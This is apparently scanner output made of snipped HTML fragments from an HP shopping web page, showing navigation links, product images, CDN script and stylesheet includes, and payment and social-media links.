f="http://www.shopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_tablet&category=rts_tablet&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_touchpads" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/tb2_70.gif" width="70"    height="70"    border="0" title="TouchPads"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/handheld/iPAQ/2/storefronts?sort=Desc&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_smartphones" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/tb3_70.gif" width="70"    height="70"    border="0" title="Smartphones"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/esp/Notebook/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_extended_service_plan_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/sh1_70.gif" width="70"    height="70"    border="0" title="HP Care Packs for Laptops"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/esp/Desktop/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/sh2_70.gif" width="70"    height="70"    border="0" title="HP Care Packs for Desktops"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/esp/Printer/1/storefronts?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_extended_service_plan_printers" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/sh3_70.gif" width="70" height="70" border="0" title="HP Care Packs for Printers"></a>
...[SNIP]...
ef="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Photosmart&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_photosmarts"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p1_70.gif"    width="70" height="70" border="0"    title="Photosmart"></a>
...[SNIP]...
href="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Officejet&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_officejets"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p2_70.gif"    width="70" height="70" border="0"    title="Officejet"></a>
...[SNIP]...
ttp://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Officejet+Pro&catLevel=1&storeName=storefronts&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_officejet_pro"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p3_70.gif"    width="70" height="70" border="0"    title="Officejet Pro"></a>
...[SNIP]...
a href="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=LaserJet&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_laserjets"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p4_70.gif"    width="70" height="70" border="0"    title="LaserJet"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Deskjet&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_deskjets"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p5_70.gif"    width="70" height="70" border="0"    title="Deskjet"></a>
...[SNIP]...
ww.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=all-in-one&catLevel=1&storeName=storefronts&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_multi_function_printers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p6_70.gif"    width="70" height="70" border="0"    title="All all-in-one printers"></a>
...[SNIP]...
Name=storefronts&landing=printer&category=HP&orderflow=1&a1=Wireless+capability%0D%0A&v1=Yes&catLevel=2#bcAnchor&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_wireless_all_printers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p7_70.gif"    width="70" height="70" border="0"    title="All wireless printers"></a>
...[SNIP]...
shopping.hp.com/webapp/shopping/can.do?landing=printer&lanAttr=HP+ePrint&category=Yes&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_eprint_printers"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p8_70.gif"    width="70" height="70" border="0"    title="All ePrint printers"></a>
...[SNIP]...
w.shopping.hp.com/webapp/shopping/print_supp_acc_landing.do?landing=supplies&selectMenu=cartridges_paper&suppliesType=ink&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_ink_supplies"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/s1_70.gif"    width="70" height="70" border="0"    title="Ink"></a>
...[SNIP]...
opping.hp.com/webapp/shopping/print_supp_acc_landing.do?landing=supplies&selectMenu=cartridges_paper&suppliesType=toner&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_toner_supplies"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/s2_70.gif"    width="70" height="70" border="0"    title="Toner"></a>
...[SNIP]...
f="http://www.shopping.hp.com/webapp/shopping/supplies_category.do?landing=printing_supplies&category=paper&cat_level=1?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_paper_supplies"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/s3_70.gif"    width="70" height="70" border="0"    title="Paper"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/accessories-store/computer?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_all_electronics"    class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp1_70.gif" width="70"    height="70"    border="0" title="All electronics"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/tvs/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tvs" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp2_70.gif" width="70"    height="70"    border="0" title="TVs"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/digital_cameras/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_digital_cameras" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp3_70.gif" width="70"    height="70"    border="0" title="Cameras &amp; video"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_deals_on_electronics"     class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp4_70.gif" width="70"    height="70"    border="0" title="Deals on electronics"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/photo_frames/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_lateralnav_photo_frames"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp5_70.gif" width="70"    height="70"    border="0" title="Photo frames"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/calculator/HP/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_calculators" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp6_70.gif" width="70"    height="70"    border="0" title="Calculators"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/software/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_software" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp7_70.gif" width="70"    height="70"    border="0" title="Boxed Software"></a>
...[SNIP]...
<p align="center" class="col21pctL    p5 m0"><a    href="http://hp.digitalriver.com/store/hpappli/DisplayHomePage/?jumpid=ex_hpds_lateralnav_download" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp8_70.gif" width="70"    height="70"    border="0" title="Downloadable Software (non-HP, partner site)"></a><br><a    href="http://hp.digitalriver.com/store/hpappli/DisplayHomePage/?jumpid=ex_hpds_lateralnav_download" class="colorFFFFFF">Downloadable<br>
...[SNIP]...
<a href="http://www.shopping.hp.com/accessories-store/computer?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_all_accessories" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a1_70.gif"    width="70" height="70" border="0"    title="All accessories"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/storage_solutions/2/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_storage" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a2_70.gif"    width="70" height="70" border="0"    title="Storage"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/mice_keyboards/2/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_peripherals" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a3_70.gif"    width="70" height="70" border="0"    title="Keyboards & Mice"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_deals_on_accessories"     class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a4_70.gif"    width="70" height="70" border="0"    title="Deals on accessories"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/carrying_cases/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_carrying_cases" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a5_70.gif"    width="70" height="70" border="0"    title="Cases"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/networking/2/accessories?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_networking" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a6_70.gif" width="70"    height="70"    border="0" title="Networking"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/speakers_headsets/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_lateralnav_pc_audio" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a7_70.gif" width="70"    height="70"    border="0" title="PC Audio"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/accessories-store/touchpad?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_touchpad_accessories" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a8_70.gif" width="70"    height="70"    border="0" title="TouchPad accessories"></a>
...[SNIP]...
//www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Usage&v1=Business&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc1_70.gif"    width="70" height="70" border="0"    title="Laptop PCs and netbooks"></a>
...[SNIP]...
shopping/can.do?storeName=storefronts&landing=rts_notebook&category=rts_notebook&a1=Category&v1=business&catLevel=2#bcAnchor&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_elitebook" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc2_70.gif"    width="70" height="70" border="0"    title="Elitebook and Probook business laptop PCs"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/esp?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc3_70.gif"    width="70" height="70" border="0"    title="HP Care Pack Services"></a>
...[SNIP]...
ww.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=servers&a1=See%20all&v1=series&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_home_servers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc4_70.gif"    width="70" height="70" border="0"    title="Servers"></a>
...[SNIP]...
p://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Usage&v1=Business&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_desktops" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc5_70.gif"    width="70" height="70" border="0"    title="Desktop and all-in-one PCs"></a>
...[SNIP]...
ttp://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=storefronts&landing=display&category=display&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_monitors" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc6_70.gif"    width="70" height="70" border="0"    title="Monitors"></a>
...[SNIP]...
="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=office&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_business_printers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc7_70.gif"    width="70" height="70" border="0"    title="Printers and all-in-ones"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=all_supplies&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_business_ink_and_toner" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc8_70.gif "    width="70" height="70" border="0"    title="Ink, Toner & Paper"></a>
...[SNIP]...
hopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_notebook&category=rts_notebook&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/qs1_70.gif" width="70"    height="70"    border="0" title="Quick-ship laptops PCs available to ship within 24 hours"></a>
...[SNIP]...
w.shopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_desktop&category=rts_desktop&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_desktops" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/qs2_70.gif" width="70"    height="70"    border="0" title="Quick-ship desktop PCs available to ship within 24 hours"></a>
...[SNIP]...
ef="http://www.shopping.hp.com/webapp/shopping/express_store.do?landing=express_store&selectMenu=specialty_store&jumpid=in_R329_prodexp/hhoslp/split/lateralnav_quick_ship_products" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/qs3_70.gif" width="70"    height="70"    border="0" title="All Quick-ship products"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/webapp/shopping/offers_guide.do?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_hot_offers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/do1_70.gif" width="70"    height="70"    border="0" title="HP and partner offers on current products"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/outlet?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_outlet_centre"    class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/do2_70.gif" width="70"    height="70"    border="0" title="Markdowns and closeout deals"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/webapp/shopping/mpss_portal.do?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_mpr" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/do3_70.gif" width="70"    height="70"    border="0" title="Exclusive offers on ink, toner, and paper"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/go/microsoftoffers?jumpid=in_R329_prodexp/hhoslp/split/lateralnav_deals_banner/sitewide_top_nav_banner_xbox_offer_911" title='Click to see details'><img style="" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/banners/topnav_sitewide_250x50_091111.jpg" width="250" height="50" border="0" alt="Click to see details" title ="Click to see details" longdesc=""></a>
...[SNIP]...
<td><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="15" alt=""></td>
...[SNIP]...
<!-- Layout change because of phonenumber shifted to head ends -->
       

<script type="text/javascript" language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/newsletter_catalog_utils.js"></script>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="6" border="0" alt=""></td>
...[SNIP]...
</style>


<script language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/newsletter_catalog_utils.js"></script>
...[SNIP]...
</style>


<script language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/newsletter_catalog_utils.js"></script>
...[SNIP]...
<div id="space1"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="5" alt="" longdesc=""></div>
...[SNIP]...
<a href="/webapp/shopping/product_advisor.do?landing=desktops&storeName=computer_store&jumpid=in_R329_prodexp/hhoslp/psg/desktops/leftnav_help_me_choose"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/icon_info.gif" style="vertical-align:middle;" border="0"/></a>
...[SNIP]...
ustOptionWindow', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=850,height=360,left=200,top=100')" title='Click for sales help via Chat, Phone or E-mail'/>
<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/icon_live_assist.gif" style="vertical-align:middle;" border=0 longDesc="" alt="Click for sales help via Chat, Phone or E-mail"></a>
...[SNIP]...
elcome.hp.com/country/us/en/welcome.html#Explore?jumpid=in_R329_prodexp/hhoslp/psg/desktops/leftnav_learn_use_create"
target="LUCWindow"
title="Learn, Use, &amp; Create">
<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/LightBulb.gif"
style="vertical-align:middle;"
border=0
longDesc=""
alt="Learn, Use, &amp; Create">

</a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/topRatedLanding.do"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/icon_top_rated_prod.gif" style="vertical-align:middle;" border=0 longDesc="" alt="Shop Top Rated"></a>
...[SNIP]...
<div id="space2"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="5" alt="" longdesc=""></div>
...[SNIP]...
<td><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="6" alt=""></td>
...[SNIP]...
<a href="#" onClick="window.open('http://www.facebook.com/HPhome','FacebookPopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=800,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/fb_icon_25x25.gif" title="Follow us on Facebook" class="socialIcon"/></a>
...[SNIP]...
<a href="#" onClick="window.open('http://twitter.com/hpdeals','TwitterPopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=800,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/twitter_icon_25x25.gif" alt="Follow us on Twitter" title="Follow us on Twitter" class="socialIcon" /></a>
...[SNIP]...
a href="#" onClick="window.open('http://h30417.www3.hp.com/p/subscribe','RSSpopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=630,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/rss_icon_25x25.gif" alt="Subscribe to our RSS feed" title="Subscribe to our RSS feed" class="socialIcon" /></a>
...[SNIP]...
<td valign="top" width="10"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="10" height="1" alt="" longdesc=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="150" height="10" alt="" longdesc=""></td>
...[SNIP]...
<td><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td class="colorCCCCCCbg"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="2" alt=""></td>
...[SNIP]...
<td><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="20" alt=""></td>
...[SNIP]...
return false;" onKeyPress="javascript:openWin('https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=TEE22ETL&content=/bmlweb/hp_tnpupto6m0250rollingiw.html',510,625);return false;"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/logos/bml_logo.gif" WIDTH="150" HEIGHT="40" border="0" alt="Bill Me Later" title= "Bill Me Later" longdesc=""></a>
...[SNIP]...
.com/cgi-bin/webscr?cmd=xpt/popup/OLCWhatIsPayPal-outside', 'olcwhatispaypal', 'toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=yes, resizable=yes, width=400, height=350');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/logos/hp_accept_paypal_150x40.gif" WIDTH="150" HEIGHT="40" border="0" alt="Now accepting PayPal" longdesc=""></a>
...[SNIP]...
bb.org/BusinessReport.aspx?CompanyID=207934','olcwhatisbbonline', 'toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=yes, resizable=yes, width=800, height=450');return false;"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/logos/BBBOnlineLogo.gif" WIDTH="135" HEIGHT="52" border="0" alt="BBB Accredited Business" longdesc=""></a>
...[SNIP]...
<a name="jumptocontent"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="10" height="1" alt=""></a>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="20" border="0" alt=""><h1>
...[SNIP]...
<td width="15"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="1" alt="" longdesc=""></td>    
<td width="2" class="bold" valign="top"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="15" alt="" longdesc=""><br>
...[SNIP]...
<br><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="2" alt="" longdesc=""></td>
...[SNIP]...
<td width="15"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="20" border="0" alt=""><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/mda_white_browse_214x60.gif" title="HP recommends Windows&#0174; 7" width="214" height="60" align="center"></td>
...[SNIP]...
<!-- Layout change because of phonenumber shifted to head ends -->
       

<script language="JavaScript" src='http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/can/can_accordion.js'></script>
...[SNIP]...
<!-- RI Landing Page Changes BEGIN -->
<script language="JavaScript" src='http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/hp_ajax.js'></script>
...[SNIP]...
<!-- TODO: Relative folder for RI content may change -->
<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/ri/all.css" rel="stylesheet" type="text/css" media="screen,print"/>
<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/ri/all_handheld.css" rel="stylesheet" type="text/css" media="handheld"/>